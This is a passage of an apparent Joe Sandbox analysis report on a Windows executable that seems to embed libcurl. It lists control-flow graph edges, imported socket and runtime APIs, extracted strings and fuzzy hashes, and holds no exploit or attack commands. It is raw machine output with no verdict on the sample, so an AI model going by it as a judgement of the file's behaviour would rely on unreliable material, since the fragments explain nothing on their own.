7ff7f1db4190 1192->1199 1200 7ff7f1db3d69 1193->1200 1201 7ff7f1db3d5d-7ff7f1db3d67 1193->1201 1205 7ff7f1db3e42-7ff7f1db3e45 1194->1205 1206 7ff7f1db3e18-7ff7f1db3e3d call 7ff7f1dad9d0 * 2 1194->1206 1215 7ff7f1db3dd6-7ff7f1db3dd8 1199->1215 1204 7ff7f1db3d70-7ff7f1db3d73 1200->1204 1201->1200 1201->1204 1211 7ff7f1db3d75-7ff7f1db3d78 1204->1211 1212 7ff7f1db3d7a-7ff7f1db3d7c 1204->1212 1208 7ff7f1db3eef-7ff7f1db3ef7 1205->1208 1209 7ff7f1db3e4b-7ff7f1db3e53 1205->1209 1206->1205 1208->1153 1209->1208 1214 7ff7f1db3e59-7ff7f1db3e60 1209->1214 1211->1187 1212->1184 1216 7ff7f1db3d7e 1212->1216 1218 7ff7f1db3e62-7ff7f1db3e78 connect 1214->1218 1219 7ff7f1db3e84-7ff7f1db3e91 WSAGetLastError 1214->1219 1215->1153 1216->1172 1218->1219 1220 7ff7f1db3e7a-7ff7f1db3e7c 1218->1220 1221 7ff7f1db3ee0 1219->1221 1222 7ff7f1db3e93-7ff7f1db3e99 1219->1222 1220->1215 1224 7ff7f1db3e82 1220->1224 1223 7ff7f1db3ee2-7ff7f1db3eea 1221->1223 1222->1221 1225 7ff7f1db3e9b-7ff7f1db3e9e 1222->1225 1224->1223 1225->1221 1226 7ff7f1db3ea0-7ff7f1db3ed6 call 7ff7f1dae9c8 call 7ff7f1db1f00 call 7ff7f1db4190 1225->1226 1226->1221
                            APIs
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DB3C24
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DB3C2C
                              • Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAE9E3
                              • Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9EB
                              • Part of subcall function 00007FF7F1DAE9C8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9FB
                              • Part of subcall function 00007FF7F1DAE9C8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEA05
                              • Part of subcall function 00007FF7F1DAE9C8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAEA18
                              • Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAA8
                              • Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAB3
                              • Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEABC
                              • Part of subcall function 00007FF7F1DAE9C8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEAC8
                              • Part of subcall function 00007FF7F1DB4190: closesocket.WS2_32 ref: 00007FF7F1DB41D8
                            • setsockopt.WS2_32 ref: 00007FF7F1DB3CB3
                            • WSAGetLastError.WS2_32 ref: 00007FF7F1DB3CBD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _errno$ErrorLast$__sys_errlist__sys_nerrclosesockethtonssetsockoptstrncpy
                            • String ID: Trying %s:%d...$Could not set TCP_NODELAY: %s$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
                            • API String ID: 3201143625-1915463321
                            • Opcode ID: f29599ba419f3726998d9c973b784c2487e8f97745410fb63b2f5a93399e771e
                            • Instruction ID: 09e76cfcee166c22b81366a4342869c8a99730b01b5434fab5b9b20d9eea0ad9
                            • Opcode Fuzzy Hash: f29599ba419f3726998d9c973b784c2487e8f97745410fb63b2f5a93399e771e
                            • Instruction Fuzzy Hash: 0E91D622B0865365EB50EB5994043B9A3B0FF45B88FC04536ED2E077C5DFBCE944A7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1233 7ff7f1d9f67b-7ff7f1d9f69d _strdup setlocale 1235 7ff7f1d9f69f-7ff7f1d9f6a2 1233->1235 1236 7ff7f1d9f6d1-7ff7f1d9f6d6 call 7ff7f1da0658 1233->1236 1237 7ff7f1d9f70f-7ff7f1d9f729 call 7ff7f1d9990c 1235->1237 1238 7ff7f1d9f6a4-7ff7f1d9f6bc strncmp 1235->1238 1240 7ff7f1d9f6db-7ff7f1d9f6de 1236->1240 1254 7ff7f1d9f74f-7ff7f1d9f752 1237->1254 1255 7ff7f1d9f72b-7ff7f1d9f72f call 7ff7f1d99d3c 1237->1255 1242 7ff7f1d9f702-7ff7f1d9f705 free 1238->1242 1243 7ff7f1d9f6be-7ff7f1d9f6cf call 7ff7f1da55c4 1238->1243 1244 7ff7f1d9f6e0-7ff7f1d9f6eb 1240->1244 1245 7ff7f1d9f6fd-7ff7f1d9f700 1240->1245 1246 7ff7f1d9f70b-7ff7f1d9f70d 1242->1246 1243->1236 1243->1242 1244->1245 1249 7ff7f1d9f6ed-7ff7f1d9f6f8 call 7ff7f1d9a7ac 1244->1249 1245->1242 1245->1246 1246->1237 1250 7ff7f1d9f734-7ff7f1d9f74e 1246->1250 1249->1245 1254->1250 1256 7ff7f1d9f754-7ff7f1d9f757 1254->1256 1255->1250 1259 7ff7f1d9f760-7ff7f1d9f763 1256->1259 1260 7ff7f1d9f759-7ff7f1d9f75e call 7ff7f1d99e74 1256->1260 1262 7ff7f1d9f7f7-7ff7f1d9f7fa 1259->1262 1263 7ff7f1d9f769-7ff7f1d9f79d call 7ff7f1da51f8 call 7ff7f1da5370 puts 1259->1263 1260->1250 1265 7ff7f1d9f804-7ff7f1d9f812 1262->1265 1266 7ff7f1d9f7fc-7ff7f1d9f7ff 1262->1266 1271 7ff7f1d9f79f-7ff7f1d9f7bf call 7ff7f1da50d8 1263->1271 1272 7ff7f1d9f7c3-7ff7f1d9f7d0 puts 1263->1272 1265->1250 1266->1250 1278 7ff7f1d9f7c1 1271->1278 1274 7ff7f1d9f7d5-7ff7f1d9f7e2 call 7ff7f1da3cec 1272->1274 1274->1250 1279 7ff7f1d9f7e8-7ff7f1d9f7f2 call 7ff7f1db67dc 1274->1279 1278->1274 1279->1250
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: puts$_strdupfreesetlocalestrncmp
                            • String ID: %s$ <none>$--disable$Build-time engines:
                            • API String ID: 1725776448-3801089455
                            • Opcode ID: 3b5d007c6cd8395034576b3d22f1ce455d1556ab9dd6917d17eba8a94fde960d
                            • Instruction ID: 25b48d138d4d1c9cc164ca6d62e90b8edcf14d6992d1611ec9a281cbc0686921
                            • Opcode Fuzzy Hash: 3b5d007c6cd8395034576b3d22f1ce455d1556ab9dd6917d17eba8a94fde960d
                            • Instruction Fuzzy Hash: A9418C25A0DA0291FF18FB11E49017DE6B1AF84B80FE44431D82E876DADFACE442C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1282 7ff7f1dbea60-7ff7f1dbead8 call 7ff7f1da4fc8 getaddrinfo 1285 7ff7f1dbec1e-7ff7f1dbec26 WSAGetLastError 1282->1285 1286 7ff7f1dbeade-7ff7f1dbeae6 1282->1286 1287 7ff7f1dbec30-7ff7f1dbec35 1285->1287 1288 7ff7f1dbec28-7ff7f1dbec2e WSAGetLastError 1285->1288 1289 7ff7f1dbec04-7ff7f1dbec0b WSASetLastError 1286->1289 1290 7ff7f1dbeaec-7ff7f1dbeaf3 1286->1290 1291 7ff7f1dbec38-7ff7f1dbec45 EnterCriticalSection 1287->1291 1288->1287 1294 7ff7f1dbec11-7ff7f1dbec17 1289->1294 1292 7ff7f1dbeaf5 1290->1292 1293 7ff7f1dbeb08 1290->1293 1297 7ff7f1dbec47-7ff7f1dbec6a LeaveCriticalSection call 7ff7f1dbe838 1291->1297 1298 7ff7f1dbec6c-7ff7f1dbec74 1291->1298 1299 7ff7f1dbeaf9-7ff7f1dbeb01 1292->1299 1296 7ff7f1dbeb0b-7ff7f1dbeb0f 1293->1296 1294->1291 1295 7ff7f1dbec19 1294->1295 1295->1285 1301 7ff7f1dbeb11-7ff7f1dbeb17 1296->1301 1302 7ff7f1dbeb19-7ff7f1dbeb1d 1296->1302 1311 7ff7f1dbecaa-7ff7f1dbecd6 call 7ff7f1deaf80 1297->1311 1304 7ff7f1dbec76-7ff7f1dbec8f send 1298->1304 1305 7ff7f1dbec9a-7ff7f1dbeca4 LeaveCriticalSection 1298->1305 1299->1299 1300 7ff7f1dbeb03-7ff7f1dbeb06 1299->1300 1300->1296 1306 7ff7f1dbeb29-7ff7f1dbeb2e 1301->1306 1307 7ff7f1dbeb23 1302->1307 1308 7ff7f1dbebcc-7ff7f1dbebd3 1302->1308 1304->1305 1310 7ff7f1dbec91-7ff7f1dbec97 WSAGetLastError 1304->1310 1305->1311 1306->1308 1314 7ff7f1dbeb34-7ff7f1dbeb39 1306->1314 1307->1306 1312 7ff7f1dbebdf-7ff7f1dbebe7 1308->1312 1313 7ff7f1dbebd5 1308->1313 1310->1305 1317 7ff7f1dbebef-7ff7f1dbebf1 1312->1317 1318 7ff7f1dbebe9 freeaddrinfo 1312->1318 1313->1290 1314->1308 1319 7ff7f1dbeb3f-7ff7f1dbeb43 1314->1319 1322 7ff7f1dbebff-7ff7f1dbec02 1317->1322 1323 7ff7f1dbebf3-7ff7f1dbebfd call 7ff7f1dd87c0 1317->1323 1318->1317 1319->1308 1321 7ff7f1dbeb49-7ff7f1dbeb63 1319->1321 1327 7ff7f1dbeb65-7ff7f1dbeba0 call 7ff7f1deca50 1321->1327 1328 7ff7f1dbebda 1321->1328 1322->1289 1322->1294 1323->1294 1331 7ff7f1dbeba2-7ff7f1dbebb4 call 7ff7f1deca50 1327->1331 1332 7ff7f1dbebb9-7ff7f1dbebc3 1327->1332 1328->1312 1331->1332 1334 7ff7f1dbebc5 1332->1334 1335 7ff7f1dbebc9 1332->1335 1334->1335 1335->1308
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast$CriticalSection$Leave$Enter__swprintf_lfreeaddrinfogetaddrinfosend
                            • String ID:
                            • API String ID: 3847685897-0
                            • Opcode ID: 1029e7bfa296ed6ce5bf69d66193a0b2a7e915dd05cf7dd7d5d43f62f75c9959
                            • Instruction ID: 5bb674dcf98341eaa3c2b7ce7ece129dbf41498565876932fb0a2bdd1af1548d
                            • Opcode Fuzzy Hash: 1029e7bfa296ed6ce5bf69d66193a0b2a7e915dd05cf7dd7d5d43f62f75c9959
                            • Instruction Fuzzy Hash: 60718B32A08A4296E764EF15E444769B7B0FB88B54F858235DA6F433D4CFBCE445E3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                            • String ID:
                            • API String ID: 3919418531-0
                            • Opcode ID: d4c35d9c68fc9c39da4a08c198358b3b14512b8affd0c6335af82e4662f8cb39
                            • Instruction ID: 7b3e72fec669ffdee81e5d561c2c114e524909373f59a30eee72cfb2c0c6c175
                            • Opcode Fuzzy Hash: d4c35d9c68fc9c39da4a08c198358b3b14512b8affd0c6335af82e4662f8cb39
                            • Instruction Fuzzy Hash: D0310A21A0A50382EB1CBB6194513B9A2B1AF45786FC4C039D92D0B2E7DFACF405C7E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DBEF88
                              • Part of subcall function 00007FF7F1DBE8A4: InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7F1DBE926
                            • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DBEEA7
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: CriticalInitializeSection_beginthreadex_errno
                            • String ID:
                            • API String ID: 1308403940-0
                            • Opcode ID: 10b75673204b49a415d22fec0ab304a5bd434f6fd44a5e68bd3ec5ad22386fd7
                            • Instruction ID: 7eec10d8702e9b285f96961822deb936ad7720a418d00bf5d93610824a1042c5
                            • Opcode Fuzzy Hash: 10b75673204b49a415d22fec0ab304a5bd434f6fd44a5e68bd3ec5ad22386fd7
                            • Instruction Fuzzy Hash: 34518036A08B81D6E718EF25E944169B3B0FB88B95F844534DE6E133A4CFBCE064D790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2029 7ff7f1d93c00-7ff7f1d93c34 2030 7ff7f1d93c36-7ff7f1d93c3c 2029->2030 2031 7ff7f1d93c56-7ff7f1d93c60 call 7ff7f1da50b0 2030->2031 2032 7ff7f1d93c3e-7ff7f1d93c54 call 7ff7f1da50b0 2030->2032 2036 7ff7f1d93c65-7ff7f1d93c6b 2031->2036 2032->2036 2037 7ff7f1d93c8d-7ff7f1d93c93 2036->2037 2038 7ff7f1d93c6d-7ff7f1d93c7e call 7ff7f1da3938 2036->2038 2037->2030 2039 7ff7f1d93c95 2037->2039 2043 7ff7f1d93c80 2038->2043 2044 7ff7f1d93cae-7ff7f1d93cc4 _strdup _close 2038->2044 2041 7ff7f1d93c97-7ff7f1d93cad 2039->2041 2043->2037 2045 7ff7f1d93ccd-7ff7f1d93cd0 2044->2045 2045->2041
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintf$_close_strdup
                            • String ID: %s\%c%s$%s\%s$._
                            • API String ID: 2153715164-4149339551
                            • Opcode ID: 74f090b0571ed39cef038922287079c43ba7b3911ef1e71206a0cb0fb7af7eca
                            • Instruction ID: 8c1ce1762cfb6d5a1c59f1def9e9446adfbe9325c28024eec4d3c5f703500137
                            • Opcode Fuzzy Hash: 74f090b0571ed39cef038922287079c43ba7b3911ef1e71206a0cb0fb7af7eca
                            • Instruction Fuzzy Hash: 50116011A0DA9A51EB04FB63A9800BAD6B0AF44B90FC44434DD3D467E5DFBCE04283A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: free$FreeLibraryfclose$Cleanup
                            • String ID:
                            • API String ID: 2673440117-0
                            • Opcode ID: c8dba129fa9e4224a65ac5167fe942a4234cdd52bc3a0e15343bb17c425e0045
                            • Instruction ID: 31307a889c14359ee1a3bd8726882947b15a882f89668aba8c77b47989f2b6d3
                            • Opcode Fuzzy Hash: c8dba129fa9e4224a65ac5167fe942a4234cdd52bc3a0e15343bb17c425e0045
                            • Instruction Fuzzy Hash: CF410B26A0DB4296E759AF51E944178B370FF44B52FC84534DA6E03BA1DFBCF4A083A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D9F3BD
                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D9F40E
                              • Part of subcall function 00007FF7F1D9A7AC: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000014,00000000,00007FF7F1D99BD1), ref: 00007FF7F1D9A7D7
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _strdup$fputs
                            • String ID: CURL_CA_BUNDLE$SSL_CERT_DIR$SSL_CERT_FILE$out of memory
                            • API String ID: 4133441535-1311070097
                            • Opcode ID: c1c9141e181f66bc0f426a4ebbf9da2df1123c3700b7bc57c219c64555e93373
                            • Instruction ID: 657ae9fd84c2c816f2e19367dfc24b2e272ff1690c69a9196b3ee205be872fdf
                            • Opcode Fuzzy Hash: c1c9141e181f66bc0f426a4ebbf9da2df1123c3700b7bc57c219c64555e93373
                            • Instruction Fuzzy Hash: E7413921A09A4781EB69FB15A4502BDE7B0AF45BD0FC40031DD6D077EAEFACE84587E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __acrt_iob_funcfreemalloc
                            • String ID: error initializing curl$error initializing curl library$error retrieving curl library information
                            • API String ID: 2771806388-2118345949
                            • Opcode ID: dd575ed8b6c6299a1a2e1f6c36b0cd8dc25f3b8e35c63980b42d970212e875bd
                            • Instruction ID: 92b09c791fae485fdf92d872b7d01951284b56fa4fe20bbd40dcd2cf74e5d8cf
                            • Opcode Fuzzy Hash: dd575ed8b6c6299a1a2e1f6c36b0cd8dc25f3b8e35c63980b42d970212e875bd
                            • Instruction Fuzzy Hash: 90318F73508B8286E308AF25D4443AC7771FB04BA4FD84234DA794B6C9EFA9E451C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • getsockname.WS2_32 ref: 00007FF7F1DB3342
                            • WSAGetLastError.WS2_32 ref: 00007FF7F1DB334C
                              • Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAE9E3
                              • Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9EB
                              • Part of subcall function 00007FF7F1DAE9C8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9FB
                              • Part of subcall function 00007FF7F1DAE9C8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEA05
                              • Part of subcall function 00007FF7F1DAE9C8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAEA18
                              • Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAA8
                              • Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAB3
                              • Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEABC
                              • Part of subcall function 00007FF7F1DAE9C8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEAC8
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DB3387
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DB338F
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _errno$ErrorLast$__sys_errlist__sys_nerrgetsocknamestrncpy
                            • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                            • API String ID: 2903212608-2605427207
                            • Opcode ID: c4ac1885f2370baf8d85bdaf03f3be84f3e363e354a6cfa8ec9d91e95885fd1b
                            • Instruction ID: 45390feafa69fafe35aaecaa5ce9885629b23fa09c9abc172803bd793a2f773a
                            • Opcode Fuzzy Hash: c4ac1885f2370baf8d85bdaf03f3be84f3e363e354a6cfa8ec9d91e95885fd1b
                            • Instruction Fuzzy Hash: 8A21AF22B1978292EB24FB15E4407EAA320BF89B85FC04034DD5E07789DFACE108C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WSAStartup.WS2_32 ref: 00007FF7F1DB1CCF
                            • WSACleanup.WS2_32 ref: 00007FF7F1DB1D60
                              • Part of subcall function 00007FF7F1DCC480: GetProcAddress.KERNELBASE ref: 00007FF7F1DCC4CF
                              • Part of subcall function 00007FF7F1DB1D84: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DB1DA8
                              • Part of subcall function 00007FF7F1DB1D84: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DB1DC4
                              • Part of subcall function 00007FF7F1DB1D84: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DB1DD7
                              • Part of subcall function 00007FF7F1DB1D84: LoadLibraryExA.KERNELBASE ref: 00007FF7F1DB1E22
                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DB1D19
                            • QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0 ref: 00007FF7F1DB1D56
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: AddressProc$CleanupFrequencyHandleLibraryLoadModulePerformanceQueryStartup_mbspbrk
                            • String ID: if_nametoindex$iphlpapi.dll
                            • API String ID: 3026270583-3097795196
                            • Opcode ID: 55aefd5f8dc4f3212abd073bfc0803467e9b6507bb7d4d37a7080f131b7ab08f
                            • Instruction ID: df288c919b1f4e71d82ab6eefd6deb89e4c52558a88b7fb46bf9ac7006f0cd88
                            • Opcode Fuzzy Hash: 55aefd5f8dc4f3212abd073bfc0803467e9b6507bb7d4d37a7080f131b7ab08f
                            • Instruction Fuzzy Hash: 0E116021A1D64392FB68F718E8053B9A3B5AF44B46FC00435D46F462D5EFACE455C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
